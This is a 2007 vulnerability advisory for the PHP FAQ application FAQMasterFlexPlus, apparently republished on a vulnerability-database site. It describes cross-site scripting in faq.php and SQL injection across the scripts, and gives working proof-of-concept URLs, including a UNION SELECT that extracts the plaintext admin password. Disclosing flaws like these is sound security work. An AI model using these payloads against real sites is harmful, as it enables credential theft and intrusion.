`- Security Advisory -
- FAQMasterFlexPlus multiple vulnerabilities -
---------------------------------------------------------------
Product: FAQMasterFlexPlus
Version: Latest version is affected, other not tested
Vendor: http://www.netbizcity.com
Affected by: Cross-Site Scripting & SQL injection
I. Introduction.
FaqMasterFlexPlus is a free, database-driven web-based application written
in php for creating and maintaining
Frequently Asked Questions (FAQs) on your web site.
It has language support and features according documentation are: "Allow to
create unlimited categories and unlimited
Questions/Answers and has web-based category and FAQ administration with
Add, Edit, Delete Capability.",
It's free software, released under the GNU General Public Lisence (GPL).
Works with php & mysql and comes bundled in some versions of Fantastico
(Cpanel X).
II. Description
Multiple flaws in FaqMasterFlexPlus have been discovered:
1) Cross Site Scripting:
The script faq.php suffers an XSS bug, specifically the variable $cat_name
it's not properly sanitized,
an attacker exploiting this flaw can perform an XSS attack to access the
targeted user cookies.
All Admin scripts to add/edit/delete categories and add/edit/delete faq
don't parse correctly the user supplied input too.
PoC:
http://www.example.com/[path/to/faq/]/faq.php?category_id=1&cat_name=[XSS]
2) SQL Injection (to exploit this issue it's necesarry magic_quotes_gpc set
to Off in the php.ini file).
All the scripts suffers for sql injections attacks in the querys to the
database.
PoC:
http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,user(),1/*
Then get a new line like this:
Q faquser@localhost
or a Proof of Concept to get the admin password:
http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,passwrd,1%20from%20users%20where%20userid='admin
Q supersecretpassword
bingo! ;)
Besides password is stored in plain text, this is a big security flaw.
This software is infected with many bugs and must be fully audited for
enforce the security.
III. Timeline
08/05/2007 - Bugs discovered
10/05/2007 - Vendor Contact (No Response)
12/12/2007 - Vendor Contacted Again (No Response)
28/12/2007 - Advisory Disclosure
IV. Credits
Juan Galiana <jgaliana gmail com>
Regards
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation